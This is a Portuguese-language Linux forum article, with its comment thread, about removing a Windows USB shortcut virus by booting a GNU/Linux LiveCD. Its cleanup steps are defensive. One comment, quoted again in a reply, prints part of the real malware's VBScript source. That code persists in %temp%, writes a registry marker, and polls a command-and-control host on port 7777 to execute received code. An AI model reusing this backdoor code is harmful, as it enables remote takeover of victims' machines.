Removendo vírus de Windows com LiveCD GNU/Linux

Existem alguns vírus de Windows que transformam as pastas em atalhos. Geralmente, com poucos comandos no "cmd", era possível removê-los. Porém, está circulando uma nova versão que altera as permissões, tornando inviável remover por dentro do próprio Windows. Explicarei uma das formas de remover o arquivo infectado com um LiveCD GNU/Linux.

[ Hits: 34.861 ]

Por: Jonathan Wolff Andrade em 16/10/2013 | Blog: http://wolffwebmaster.com.br


Como se comporta



Olá, galera!

Um novo vírus de Windows, que transforma pastas em atalhos, está rodando por aí.

Ele altera o sistema de permissões do Windows, tornando impossível a remoção por dentro do S.O., mesmo com o usuário administrador, ComboFix ou qualquer outra coisa. Só observei este vírus, com estas características, neste ano (2013), antes era de fácil remoção.

Ele se comporta como os anteriores: todo Pendrive conectado em um PC Windows infectado transmitirá o vírus e vice-versa, resultando no problema de transformar as pastas do Pendrive infectado em atalhos.
Linux: Removendo vírus de Windows com LiveCD GNU/Linux

Se você colocar um Pendrive novo em um PC infectado, ele também será infectado. Portanto, os tutoriais que ensinam a remover vírus de Pendrives, são falhos, pois este também se aloja no Windows. Exemplo: quando tua namorada tá com gripe, não adianta usar um copo separado, pois quando beijá-la, vai "gripar" do mesmo jeito.

Tá, mas aqui é o VOL, e você tá falando de um vírus de Windows que todo mundo "conhece"?! Sim, pois a única solução que encontrei foi através do GNU/Linux, de forma robusta e segura. Em minha opinião, o GNU/Linux já é a solução para um monte de coisa, e esta é mais uma delas.

Caso você tenha conhecimentos suficientes na ponta da língua e quer resolver sozinho, sem minha explicação, faça o seguinte:

Em um PC com dual-boot (Windows e GNU/Linux rodando) modo avançado:

1. Entre no GNU/Linux, remova o arquivo C:/Windows/System32/wscript.exe, pois o danado se aloja nele, dentro do Windows, ele não permite a remoção. Pronto, o computador está desinfectado.

Porém, este arquivo é do próprio Windows, conforme esta página:
Então, de preferência, copie de algum computador não infectado, ou deixe sem. Eu removi e deixei sem em alguns computadores, estes estão funcionando 100%.

2. Formate o Pendrive infectado no GNU/Linux ou remova o arquivo w.vbs dentro do Pendrive, pois ele é o responsável por criar e deixar visível apenas os links (de certa forma, no pendrive), ele é o vírus! Pronto, agora o pendrive também está desinfectado.
Linux: Removendo vírus de Windows com LiveCD GNU/Linux
Funcionou pra você? Deixe sua opinião nos comentários.

Caso você precise de mais detalhes, confira nas próximas páginas.

    Próxima página

Páginas do artigo
   1. Como se comporta
   2. Removendo o vírus pelo Live CD
Outros artigos deste autor

Terminal Didático - Shell Script via WEB (PHP + Bootstrap)

Mozilla Firefox é coisa do tinhoso?! Mito, verdade ou apenas um easter egg proposital?

Leitura recomendada

LVM completo e sem mistérios

Entendendo o ReiserFS

Dm-crypt - Criptografia no filesystem - Kernel 2.6

Entendendo o sistema de arquivos do Linux

NFS rápido e direto usando Slackware 12

  
Comentários
[1] Comentário enviado por ktec em 16/10/2013 - 08:25h

Ola , esse último arquivo o W.VBS não esta sendo encontrado dentro do meu HD Externo , onde está o virus , ja fiz o passo anterior de remover o wind.32 . E agora o que fazer?

[2] Comentário enviado por welingtoninfo em 16/10/2013 - 11:31h

Fiz um vídeo ensinando como reparar os atalhos, mas não consegui até hoje pelo Windows remover o maldito vírus. Vou tentar desse modo.

http://www.youtube.com/watch?v=mVCDcKvX2M4

Meu canal: www.youtube.com/welingtoninfo

[3] Comentário enviado por jwolff em 16/10/2013 - 11:40h


[1] Comentário enviado por ktec em 16/10/2013 - 08:25h:

Ola , esse último arquivo o W.VBS não esta sendo encontrado dentro do meu HD Externo , onde está o virus , ja fiz o passo anterior de remover o wind.32 . E agora o que fazer?


Você está visualizando pelo Linux ou Windows?

[4] Comentário enviado por jwolff em 16/10/2013 - 11:43h


[2] Comentário enviado por welingtoninfo em 16/10/2013 - 11:31h:

Fiz um vídeo ensinando como reparar os atalhos, mas não consegui até hoje pelo Windows remover o maldito vírus. Vou tentar desse modo.

http://www.youtube.com/watch?v=mVCDcKvX2M4

Meu canal: www.youtube.com/welingtoninfo


Se entrar [pelo Linux], remover o arquivo W.VBS o vírus será extinto. E as pastas voltarão a ser exibidas, mesmo no Windows(se o computador também estiver desinfectado).

[5] Comentário enviado por removido em 16/10/2013 - 19:32h

Os nomes podem mudar: Pasta b9b9b e aquivos 1ab7.js que estarão ocultos na pasta de usuário, arquivos de programs e C:
No meu caso todos arquivos "vírus" tinha extensão .js que roda no Wscript.exe.
Penso que o que o .vbs é o VBscript.exe.
Realmente está mais chato de tirar essas encrenca. Ela evoluiu um pouco. No ano passado tinha muitos infectados com algo do tipo mas era bem mais simples ficar livre.

[6] Comentário enviado por removido em 16/10/2013 - 19:46h

Removi um monte desses vírus hoje no trampo.

[7] Comentário enviado por ianclever em 16/10/2013 - 20:06h

Olha eu tinha optado por não liberar informações sobre como remover esse vírus, mas já que criou um artigo, tenho uma forma melhor de solucionar isso:

o nome desse vírus é Hanza.vbs, e sim é um VBscript, no caso o que vc fez é remover o interpretador de scripts do windows, o que pode prejudicar caso algum programa precise, o vírus Hanza.vbs, se aloja nessas pastas no windows(testado no 7):

C:/Users/"Usuario"/AppData/Local/Temp

e

C:/Users/"Usuário"/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup

removendo desses 2 lugares ele para de infectar pendrives, para liberar o pendrive desse vírus, basta acessar seu pendrive pelo GNU/Linux nas versões meis recentes acho que é:

#cd /media/"usuário"/nome_do_pendrive/

rm -rf *.vbs
rm -rf *.lnk
rm -rf *.ini
rm -rf *.inf
por desencargo de consiência tire agora o que ficou no pedrive, formate e volte os dados para lá.

[8] Comentário enviado por ianclever em 16/10/2013 - 20:07h

de qualquer forma parabéns pelo artigo!

[9] Comentário enviado por Nilodanx52 em 16/10/2013 - 23:31h


[7] Comentário enviado por ianclever em 16/10/2013 - 20:06h:

Olha eu tinha optado por não liberar informações sobre como remover esse vírus, mas já que criou um artigo, tenho uma forma melhor de solucionar isso:

o nome desse vírus é Hanza.vbs, e sim é um VBscript, no caso o que vc fez é remover o interpretador de scripts do windows, o que pode prejudicar caso algum programa precise, o vírus Hanza.vbs, se aloja nessas pastas no windows(testado no 7):

C:/Users/"Usuario"/AppData/Local/Temp

e

C:/Users/"Usuário"/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup

removendo desses 2 lugares ele para de infectar pendrives, para liberar o pendrive desse vírus, basta acessar seu pendrive pelo GNU/Linux nas versões meis recentes acho que é:

#cd /media/"usuário"/nome_do_pendrive/

rm -rf *.vbs
rm -rf *.lnk
rm -rf *.ini
rm -rf *.inf
por desencargo de consiência tire agora o que ficou no pedrive, formate e volte os dados para lá.


Opa! Boa noite amigos!!!

Seguinte só reforçando tudo o que já foi dito, ainda existe casos que os diretórios e os arquivos "saudáveis" ainda ficam oculto no windows e muita gente consegue se desesperar! RSRSRS
Acontece que se você mover tudo usando o Linux para um outro lugar e depois se quiser voltar a copiar tais arquivos para o mesmo dispositivo ele será exibido normalmente no windows pois o linux só enxerga o diretório ou arquivo oculto quando a um ponto na frente dos mesmos exemplo:

--> (Visível) "Arquivo_de_vídeo.mp4" <---> (Oculto) ".Arquivo_de_vídeo.mp4" <--

[10] Comentário enviado por Allan Sampaio em 17/10/2013 - 08:40h

[7] Comentário enviado por ianclever em 16/10/2013 - 20:06h:

Olha eu tinha optado por não liberar informações sobre como remover esse vírus, mas já que criou um artigo, tenho uma forma melhor de solucionar isso:

o nome desse vírus é Hanza.vbs, e sim é um VBscript, no caso o que vc fez é remover o interpretador de scripts do windows, o que pode prejudicar caso algum programa precise, o vírus Hanza.vbs, se aloja nessas pastas no windows(testado no 7):

C:/Users/"Usuario"/AppData/Local/Temp

e

C:/Users/"Usuário"/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup

removendo desses 2 lugares ele para de infectar pendrives, para liberar o pendrive desse vírus, basta acessar seu pendrive pelo GNU/Linux nas versões meis recentes acho que é:

#cd /media/"usuário"/nome_do_pendrive/

rm -rf *.vbs
rm -rf *.lnk
rm -rf *.ini
rm -rf *.inf
por desencargo de consiência tire agora o que ficou no pedrive, formate e volte os dados para lá.

OBS: Para visualizar os arquivos do pendrive no windows basta:

Abrir o CMD

LetraPendrive:
attrib /D /S -r -h -s *.*
del *.lnk;*.vbs;*.inf;*.ini
exit

O que acontece é que este virus altera as permissões dos arquivos, alterando para arquivos do sistema. No Windows é bloqueado a visualização de arquivos do sistema, no Windows Explorer, mas alterando esta configuração de visualização você consegue ver os seus arquivos.


Tambem é bom verificar a pasta C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup, para ver se está não está com virus.

[11] Comentário enviado por jwolff em 17/10/2013 - 08:48h


[5] Comentário enviado por tonyfrasouza em 16/10/2013 - 19:32h:

Os nomes podem mudar: Pasta b9b9b e aquivos 1ab7.js que estarão ocultos na pasta de usuário, arquivos de programs e C:
No meu caso todos arquivos "vírus" tinha extensão .js que roda no Wscript.exe.
Penso que o que o .vbs é o VBscript.exe.
Realmente está mais chato de tirar essas encrenca. Ela evoluiu um pouco. No ano passado tinha muitos infectados com algo do tipo mas era bem mais simples ficar livre.


Hmm, interessante, provavelmente se trata de outra versão, ou outro vírus. Obrigado pela contribuição.

[12] Comentário enviado por jwolff em 17/10/2013 - 08:54h


[7] Comentário enviado por ianclever em 16/10/2013 - 20:06h:

Olha eu tinha optado por não liberar informações sobre como remover esse vírus, mas já que criou um artigo, tenho uma forma melhor de solucionar isso:

o nome desse vírus é Hanza.vbs, e sim é um VBscript, no caso o que vc fez é remover o interpretador de scripts do windows, o que pode prejudicar caso algum programa precise, o vírus Hanza.vbs, se aloja nessas pastas no windows(testado no 7):

C:/Users/"Usuario"/AppData/Local/Temp

e

C:/Users/"Usuário"/AppData/Roaming/Microsoft/Windows/Start Menu/Programs/Startup

removendo desses 2 lugares ele para de infectar pendrives, para liberar o pendrive desse vírus, basta acessar seu pendrive pelo GNU/Linux nas versões meis recentes acho que é:

#cd /media/"usuário"/nome_do_pendrive/

rm -rf *.vbs
rm -rf *.lnk
rm -rf *.ini
rm -rf *.inf
por desencargo de consiência tire agora o que ficou no pedrive, formate e volte os dados para lá.


Legal cara, não sabia disto :D
A forma que eu citei, eu tinha ciência de que não estava removendo da maneira "100%" certa. Mas já que o seu método também é funcional, pode ser útil para outras pessoas. Obrigado pela contribuição.

Só uma coisa, meu objetivo não estava apenas em ensinar uma forma de remover, está mais para mostrar como o GNU/Linux é mais robusto e poderoso que o Windows.

[13] Comentário enviado por ianclever em 17/10/2013 - 09:46h

como esse vírus já é muito difundido ele pode aprecer com outros nomes, por aí, mas a dica para achar ele é ver o nome do arquivo vbs no pendrive infectado, será o mesmo nome que ele tem no sistema, aí é so entrar em um live cd de uma distro GNU/Linux e pesquisar na raiz do sistema por esse mesmo nome( pelo windows explorer não acha, ja testei) acha a localização do danado e deleta ele.

[14] Comentário enviado por oliviofarias em 19/10/2013 - 10:53h

Faço muito isso... XD

[15] Comentário enviado por px em 19/10/2013 - 21:14h

Nossa, nem tava sabendo desse vírus tava rolando por ai... uso linux a tanto tempo que nem sei mais oq vírus significa, rsrsrs

[16] Comentário enviado por spish em 19/10/2013 - 23:22h

Também tivemos problemas com esse malware hidden aqui no serviço. No meu caso além de fazer o que o colega “ianclever” fez, um colega descobriu que não era necessário remover o arquivo “WSCRIPT.EXE” ele fez o seguinte: chamou wscript.exe no executar do Windows, daí abriu a caixa de diálogo Configurações do Windows Script Host, então ele marcou a primeira opção que é Interromper o script após um determinado número de segundos e deixou 1 segundo mesmo. Esse tipo de medida é paliativa, uma vez que algumas aplicações podem ser afetadas. Abrimos chamado para a Microsoft, pois o antivírus é o Forefront, com a atualização então o próprio antivírus passou a eliminar essa praga. Detalhe: o procedimento pode ser feito no perfil do usuário, sem ser necessário que o perfil dele seja administrador do PC.

[17] Comentário enviado por Nilodanx52 em 20/10/2013 - 01:37h


[16] Comentário enviado por spish em 19/10/2013 - 23:22h:

Também tivemos problemas com esse malware hidden aqui no serviço. No meu caso além de fazer o que o colega “ianclever” fez, um colega descobriu que não era necessário remover o arquivo “WSCRIPT.EXE” ele fez o seguinte: chamou wscript.exe no executar do Windows, daí abriu a caixa de diálogo Configurações do Windows Script Host, então ele marcou a primeira opção que é Interromper o script após um determinado número de segundos e deixou 1 segundo mesmo. Esse tipo de medida é paliativa, uma vez que algumas aplicações podem ser afetadas. Abrimos chamado para a Microsoft, pois o antivírus é o Forefront, com a atualização então o próprio antivírus passou a eliminar essa praga. Detalhe: o procedimento pode ser feito no perfil do usuário, sem ser necessário que o perfil dele seja administrador do PC.


Tentou usar o Dr Web? Uso nos windows daqui da casa funciona bem melhor. Além de ser de tecnologia russa. rsrsrsrs

[18] Comentário enviado por spish em 20/10/2013 - 20:26h


[17] Comentário enviado por Nilodanx52 em 20/10/2013 - 01:37h:


[16] Comentário enviado por spish em 19/10/2013 - 23:22h:

Também tivemos problemas com esse malware hidden aqui no serviço. No meu caso além de fazer o que o colega “ianclever” fez, um colega descobriu que não era necessário remover o arquivo “WSCRIPT.EXE” ele fez o seguinte: chamou wscript.exe no executar do Windows, daí abriu a caixa de diálogo Configurações do Windows Script Host, então ele marcou a primeira opção que é Interromper o script após um determinado número de segundos e deixou 1 segundo mesmo. Esse tipo de medida é paliativa, uma vez que algumas aplicações podem ser afetadas. Abrimos chamado para a Microsoft, pois o antivírus é o Forefront, com a atualização então o próprio antivírus passou a eliminar essa praga. Detalhe: o procedimento pode ser feito no perfil do usuário, sem ser necessário que o perfil dele seja administrador do PC.

Tentou usar o Dr Web? Uso nos windows daqui da casa funciona bem melhor. Além de ser de tecnologia russa. rsrsrsrs



Não conhecia essa solução. Obrigado pela dica, mas não temos mais problemas com essa praga por aqui. Tomara que continue assim. Valeu.

[19] Comentário enviado por thyagobrasileiro em 21/10/2013 - 04:01h

No meu caso, o nome do arquivo malicioso era servica.vbs, e em vez de exclui-lo no linux eu usei um comando para analisar o que ele fazia, mas antes de mostrar o resultado, o objetivo desse virus não é apenas de ocultar seus arquivos, isto é apenas uma distração. segue o codigo gerado pelo seguinte comando:


#strings servica.vbs


On Error Resume Next
dim sh ' shell
set sh =WScript.CreateObject("WScript.Shell")
dim fs ' filesystem
set fs= CreateObject("Scripting.FileSystemObject")
dim host
host="jn.redirectme.net"
dim port
port= 7777
dim DR
DR = sh.ExpandEnvironmentStrings("%temp%") & "\"
dim FN
FN ="Servieca.vbs"
dim fh
dim us
us="~"
ins
dim spl
spl="jnJnj"
dim i
i=0
while true
dim a
a= split(post("ready",""),spl)
select case a(0)
case "exc"
dim sa
sa= a(1)
execute sa
case "uns"
uns
end select
wscript.sleep 4000
i = i + 1
if i> 2 then
i=0
xins
end if
wend

function ins
on error resume next
us= sh.regread("HKCU\njq8")
if us="~" then
if lcase( mid(wscript.scriptfullname,2))=":\" & lcase(fn) then
us="y"
sh.regwrite "HKCU\njq8", us, "REG_SZ"
else
us="n"
sh.regwrite "HKCU\njq8", us, "REG_SZ"
end if
end if
Err.Clear
fs.CopyFile wscript.scriptfullname,dr & fn ,true
set fh = fs.OpenTextFile( dr & fn, 8, false)
if Err.Number>0 then
wscript.quit
end if
xins
end function

[20] Comentário enviado por jwolff em 21/10/2013 - 10:55h


[19] Comentário enviado por thyagobrasileiro em 21/10/2013 - 04:01h:

No meu caso, o nome do arquivo malicioso era servica.vbs, e em vez de exclui-lo no linux eu usei um comando para analisar o que ele fazia, mas antes de mostrar o resultado, o objetivo desse virus não é apenas de ocultar seus arquivos, isto é apenas uma distração. segue o codigo gerado pelo seguinte comando:


#strings servica.vbs


On Error Resume Next
dim sh ' shell
set sh =WScript.CreateObject("WScript.Shell")
dim fs ' filesystem
set fs= CreateObject("Scripting.FileSystemObject")
dim host
host="jn.redirectme.net"
dim port
port= 7777
dim DR
DR = sh.ExpandEnvironmentStrings("%temp%") & "\"
dim FN
FN ="Servieca.vbs"
dim fh
dim us
us="~"
ins
dim spl
spl="jnJnj"
dim i
i=0
while true
dim a
a= split(post("ready",""),spl)
select case a(0)
case "exc"
dim sa
sa= a(1)
execute sa
case "uns"
uns
end select
wscript.sleep 4000
i = i + 1
if i> 2 then
i=0
xins
end if
wend

function ins
on error resume next
us= sh.regread("HKCU\njq8")
if us="~" then
if lcase( mid(wscript.scriptfullname,2))=":\" & lcase(fn) then
us="y"
sh.regwrite "HKCU\njq8", us, "REG_SZ"
else
us="n"
sh.regwrite "HKCU\njq8", us, "REG_SZ"
end if
end if
Err.Clear
fs.CopyFile wscript.scriptfullname,dr & fn ,true
set fh = fs.OpenTextFile( dr & fn, 8, false)
if Err.Number>0 then
wscript.quit
end if
xins
end function


Hehe, bom pra eles :)

[21] Comentário enviado por jwolff em 21/10/2013 - 10:57h


[16] Comentário enviado por spish em 19/10/2013 - 23:22h:

Também tivemos problemas com esse malware hidden aqui no serviço. No meu caso além de fazer o que o colega “ianclever” fez, um colega descobriu que não era necessário remover o arquivo “WSCRIPT.EXE” ele fez o seguinte: chamou wscript.exe no executar do Windows, daí abriu a caixa de diálogo Configurações do Windows Script Host, então ele marcou a primeira opção que é Interromper o script após um determinado número de segundos e deixou 1 segundo mesmo. Esse tipo de medida é paliativa, uma vez que algumas aplicações podem ser afetadas. Abrimos chamado para a Microsoft, pois o antivírus é o Forefront, com a atualização então o próprio antivírus passou a eliminar essa praga. Detalhe: o procedimento pode ser feito no perfil do usuário, sem ser necessário que o perfil dele seja administrador do PC.


Legal cara, obrigado pela contribuição. Eu especifiquei que não é recomendado remover o wscript.exe, e se remover tentar substituir... Mas enfim, sua dica é mais funcional ainda! Porém, o procedimento é menos intuitivo, e foge do objetivo do artigo.

[22] Comentário enviado por spish em 21/10/2013 - 12:40h


[21] Comentário enviado por jwolff em 21/10/2013 - 10:57h:


[16] Comentário enviado por spish em 19/10/2013 - 23:22h:

Também tivemos problemas com esse malware hidden aqui no serviço. No meu caso além de fazer o que o colega “ianclever” fez, um colega descobriu que não era necessário remover o arquivo “WSCRIPT.EXE” ele fez o seguinte: chamou wscript.exe no executar do Windows, daí abriu a caixa de diálogo Configurações do Windows Script Host, então ele marcou a primeira opção que é Interromper o script após um determinado número de segundos e deixou 1 segundo mesmo. Esse tipo de medida é paliativa, uma vez que algumas aplicações podem ser afetadas. Abrimos chamado para a Microsoft, pois o antivírus é o Forefront, com a atualização então o próprio antivírus passou a eliminar essa praga. Detalhe: o procedimento pode ser feito no perfil do usuário, sem ser necessário que o perfil dele seja administrador do PC.

Legal cara, obrigado pela contribuição. Eu especifiquei que não é recomendado remover o wscript.exe, e se remover tentar substituir... Mas enfim, sua dica é mais funcional ainda! Porém, o procedimento é menos intuitivo, e foge do objetivo do artigo.


Peço desculpas por ter fugido do artigo com o meu comentário. E quando disse que esse tipo de medida é paliativa não se ofenda, mas é mesmo. Minha intenção era contribuir com a péssima experiência que tive com esse malware. Com todo respeito, por que é pouco intuitivo? Eu posso fazer no próprio Windows, além de não precisar remover o arquivo WSCRIPT.EXE, e além do mais posso fazer no perfil do usuário. Até concordo, pois o título do artigo é Removendo vírus de Windows com LiveCD GNU/Linux. Da forma que falei não é necessário usar Linux. Outra coisa. Já que gastei essas linhas se me permite e mais uma vez não queria fugir do artigo longe disso eu só queria acrescentar, pois não vi por aqui nos comentários Ok? Quem quiser testar no Windows antes de remover os atalhos tem que verificar se o processo WSCRIPT.EXE está rodando. Caso esteja é necessário removê-lo. Não se ofenda com minhas palavras amigo. Obrigado mais uma vez por contribuir. Já vi muitos usuários formatando pendrive e HD's por causa desse maldito sendo que não é necessário. Grande abraço.

[23] Comentário enviado por fernandoguedes em 21/10/2013 - 13:03h

Esse vírus não é novo, é bem antigo, graças a essa praga, há 7 anos sou usuário linux! :)

[24] Comentário enviado por jwolff em 21/10/2013 - 13:59h


[22] Comentário enviado por spish em 21/10/2013 - 12:40h:


[21] Comentário enviado por jwolff em 21/10/2013 - 10:57h:


[16] Comentário enviado por spish em 19/10/2013 - 23:22h:

Também tivemos problemas com esse malware hidden aqui no serviço. No meu caso além de fazer o que o colega “ianclever” fez, um colega descobriu que não era necessário remover o arquivo “WSCRIPT.EXE” ele fez o seguinte: chamou wscript.exe no executar do Windows, daí abriu a caixa de diálogo Configurações do Windows Script Host, então ele marcou a primeira opção que é Interromper o script após um determinado número de segundos e deixou 1 segundo mesmo. Esse tipo de medida é paliativa, uma vez que algumas aplicações podem ser afetadas. Abrimos chamado para a Microsoft, pois o antivírus é o Forefront, com a atualização então o próprio antivírus passou a eliminar essa praga. Detalhe: o procedimento pode ser feito no perfil do usuário, sem ser necessário que o perfil dele seja administrador do PC.

Legal cara, obrigado pela contribuição. Eu especifiquei que não é recomendado remover o wscript.exe, e se remover tentar substituir... Mas enfim, sua dica é mais funcional ainda! Porém, o procedimento é menos intuitivo, e foge do objetivo do artigo.

Peço desculpas por ter fugido do artigo com o meu comentário. E quando disse que esse tipo de medida é paliativa não se ofenda, mas é mesmo. Minha intenção era contribuir com a péssima experiência que tive com esse malware. Com todo respeito, por que é pouco intuitivo? Eu posso fazer no próprio Windows, além de não precisar remover o arquivo WSCRIPT.EXE, e além do mais posso fazer no perfil do usuário. Até concordo, pois o título do artigo é Removendo vírus de Windows com LiveCD GNU/Linux. Da forma que falei não é necessário usar Linux. Outra coisa. Já que gastei essas linhas se me permite e mais uma vez não queria fugir do artigo longe disso eu só queria acrescentar, pois não vi por aqui nos comentários Ok? Quem quiser testar no Windows antes de remover os atalhos tem que verificar se o processo WSCRIPT.EXE está rodando. Caso esteja é necessário removê-lo. Não se ofenda com minhas palavras amigo. Obrigado mais uma vez por contribuir. Já vi muitos usuários formatando pendrive e HD's por causa desse maldito sendo que não é necessário. Grande abraço.


Porque aqui é o Viva o Linux e não o Viva o Windows cara D: Pouco intuitivo porque eu usei este método porque ele "força" o usuário a testar o Ubuntu, usar o LILI, interagir com as interfaces... Digamos que o artigo é "for dummies", se alguém que leu não se encaixa neste grupo, a escolha é própria, a leitura é facultativa, e a opinião ou critica é desnecessária. Não to falando especificamente do teu comentário, mas tem uma galera falando outras formas de remover(dentro do Windows), que o vírus não é isso que é aquilo. Eu não to nem ai! Só mostrei uma forma PROPOSITAL com o Linux, porque eu quero mostrar as vantagens do Linux, pra quem ainda é preso ao Windows. Estritamente isto. Tem muita gente que nem leu o que eu escrevi, e já vai metendo pau, numa tentativa desnecessária de demonstrar conhecimento. Se querem falar isso ou aquilo, cria um artigo próprio e seja feliz. O meu objetivo já foi atingido. Muito Obrigado.

[25] Comentário enviado por spish em 21/10/2013 - 14:53h


[24] Comentário enviado por jwolff em 21/10/2013 - 13:59h:


[22] Comentário enviado por spish em 21/10/2013 - 12:40h:


[21] Comentário enviado por jwolff em 21/10/2013 - 10:57h:


[16] Comentário enviado por spish em 19/10/2013 - 23:22h:

Também tivemos problemas com esse malware hidden aqui no serviço. No meu caso além de fazer o que o colega “ianclever” fez, um colega descobriu que não era necessário remover o arquivo “WSCRIPT.EXE” ele fez o seguinte: chamou wscript.exe no executar do Windows, daí abriu a caixa de diálogo Configurações do Windows Script Host, então ele marcou a primeira opção que é Interromper o script após um determinado número de segundos e deixou 1 segundo mesmo. Esse tipo de medida é paliativa, uma vez que algumas aplicações podem ser afetadas. Abrimos chamado para a Microsoft, pois o antivírus é o Forefront, com a atualização então o próprio antivírus passou a eliminar essa praga. Detalhe: o procedimento pode ser feito no perfil do usuário, sem ser necessário que o perfil dele seja administrador do PC.

Legal cara, obrigado pela contribuição. Eu especifiquei que não é recomendado remover o wscript.exe, e se remover tentar substituir... Mas enfim, sua dica é mais funcional ainda! Porém, o procedimento é menos intuitivo, e foge do objetivo do artigo.

Peço desculpas por ter fugido do artigo com o meu comentário. E quando disse que esse tipo de medida é paliativa não se ofenda, mas é mesmo. Minha intenção era contribuir com a péssima experiência que tive com esse malware. Com todo respeito, por que é pouco intuitivo? Eu posso fazer no próprio Windows, além de não precisar remover o arquivo WSCRIPT.EXE, e além do mais posso fazer no perfil do usuário. Até concordo, pois o título do artigo é Removendo vírus de Windows com LiveCD GNU/Linux. Da forma que falei não é necessário usar Linux. Outra coisa. Já que gastei essas linhas se me permite e mais uma vez não queria fugir do artigo longe disso eu só queria acrescentar, pois não vi por aqui nos comentários Ok? Quem quiser testar no Windows antes de remover os atalhos tem que verificar se o processo WSCRIPT.EXE está rodando. Caso esteja é necessário removê-lo. Não se ofenda com minhas palavras amigo. Obrigado mais uma vez por contribuir. Já vi muitos usuários formatando pendrive e HD's por causa desse maldito sendo que não é necessário. Grande abraço.

Porque aqui é o Viva o Linux e não o Viva o Windows cara D: Pouco intuitivo porque eu usei este método porque ele "força" o usuário a testar o Ubuntu, usar o LILI, interagir com as interfaces... Digamos que o artigo é "for dummies", se alguém que leu não se encaixa neste grupo, a escolha é própria, a leitura é facultativa, e a opinião ou critica é desnecessária. Não to falando especificamente do teu comentário, mas tem uma galera falando outras formas de remover(dentro do Windows), que o vírus não é isso que é aquilo. Eu não to nem ai! Só mostrei uma forma PROPOSITAL com o Linux, porque eu quero mostrar as vantagens do Linux, pra quem ainda é preso ao Windows. Estritamente isto. Tem muita gente que nem leu o que eu escrevi, e já vai metendo pau, numa tentativa desnecessária de demonstrar conhecimento. Se querem falar isso ou aquilo, cria um artigo próprio e seja feliz. O meu objetivo já foi atingido. Muito Obrigado.


Bacana de sua parte o feedback. Entendi agora. Parabéns pelo artigo. Mais uma vez não meti o pau ;) li todo o artigo se fosse para falar alguma coisa para te magoar nem teria colocado. Aliás nem teria lido, mas gostei tanto que resolvi comentar. Algo que não faço com muita frequência por aqui. Nota 10!!! Valeu.


[26] Comentário enviado por jwolff em 21/10/2013 - 15:01h


[25] Comentário enviado por spish em 21/10/2013 - 14:53h:


[24] Comentário enviado por jwolff em 21/10/2013 - 13:59h:


[22] Comentário enviado por spish em 21/10/2013 - 12:40h:


[21] Comentário enviado por jwolff em 21/10/2013 - 10:57h:


[16] Comentário enviado por spish em 19/10/2013 - 23:22h:

Também tivemos problemas com esse malware hidden aqui no serviço. No meu caso além de fazer o que o colega “ianclever” fez, um colega descobriu que não era necessário remover o arquivo “WSCRIPT.EXE” ele fez o seguinte: chamou wscript.exe no executar do Windows, daí abriu a caixa de diálogo Configurações do Windows Script Host, então ele marcou a primeira opção que é Interromper o script após um determinado número de segundos e deixou 1 segundo mesmo. Esse tipo de medida é paliativa, uma vez que algumas aplicações podem ser afetadas. Abrimos chamado para a Microsoft, pois o antivírus é o Forefront, com a atualização então o próprio antivírus passou a eliminar essa praga. Detalhe: o procedimento pode ser feito no perfil do usuário, sem ser necessário que o perfil dele seja administrador do PC.

Legal cara, obrigado pela contribuição. Eu especifiquei que não é recomendado remover o wscript.exe, e se remover tentar substituir... Mas enfim, sua dica é mais funcional ainda! Porém, o procedimento é menos intuitivo, e foge do objetivo do artigo.

Peço desculpas por ter fugido do artigo com o meu comentário. E quando disse que esse tipo de medida é paliativa não se ofenda, mas é mesmo. Minha intenção era contribuir com a péssima experiência que tive com esse malware. Com todo respeito, por que é pouco intuitivo? Eu posso fazer no próprio Windows, além de não precisar remover o arquivo WSCRIPT.EXE, e além do mais posso fazer no perfil do usuário. Até concordo, pois o título do artigo é Removendo vírus de Windows com LiveCD GNU/Linux. Da forma que falei não é necessário usar Linux. Outra coisa. Já que gastei essas linhas se me permite e mais uma vez não queria fugir do artigo longe disso eu só queria acrescentar, pois não vi por aqui nos comentários Ok? Quem quiser testar no Windows antes de remover os atalhos tem que verificar se o processo WSCRIPT.EXE está rodando. Caso esteja é necessário removê-lo. Não se ofenda com minhas palavras amigo. Obrigado mais uma vez por contribuir. Já vi muitos usuários formatando pendrive e HD's por causa desse maldito sendo que não é necessário. Grande abraço.

Porque aqui é o Viva o Linux e não o Viva o Windows cara D: Pouco intuitivo porque eu usei este método porque ele "força" o usuário a testar o Ubuntu, usar o LILI, interagir com as interfaces... Digamos que o artigo é "for dummies", se alguém que leu não se encaixa neste grupo, a escolha é própria, a leitura é facultativa, e a opinião ou critica é desnecessária. Não to falando especificamente do teu comentário, mas tem uma galera falando outras formas de remover(dentro do Windows), que o vírus não é isso que é aquilo. Eu não to nem ai! Só mostrei uma forma PROPOSITAL com o Linux, porque eu quero mostrar as vantagens do Linux, pra quem ainda é preso ao Windows. Estritamente isto. Tem muita gente que nem leu o que eu escrevi, e já vai metendo pau, numa tentativa desnecessária de demonstrar conhecimento. Se querem falar isso ou aquilo, cria um artigo próprio e seja feliz. O meu objetivo já foi atingido. Muito Obrigado.

Bacana de sua parte o feedback. Entendi agora. Parabéns pelo artigo. Mais uma vez não meti o pau ;) li todo o artigo se fosse para falar alguma coisa para te magoar nem teria colocado. Aliás nem teria lido, mas gostei tanto que resolvi comentar. Algo que não faço com muita frequência por aqui. Nota 10!!! Valeu.



Não magoou, espero que você também não.
Então ficou tudo certo meu amigo :D Paz de Jah! Valeu.


[27] Comentário enviado por spish em 21/10/2013 - 17:15h


[26] Comentário enviado por jwolff em 21/10/2013 - 15:01h:


[25] Comentário enviado por spish em 21/10/2013 - 14:53h:


[24] Comentário enviado por jwolff em 21/10/2013 - 13:59h:


[22] Comentário enviado por spish em 21/10/2013 - 12:40h:


[21] Comentário enviado por jwolff em 21/10/2013 - 10:57h:


[16] Comentário enviado por spish em 19/10/2013 - 23:22h:

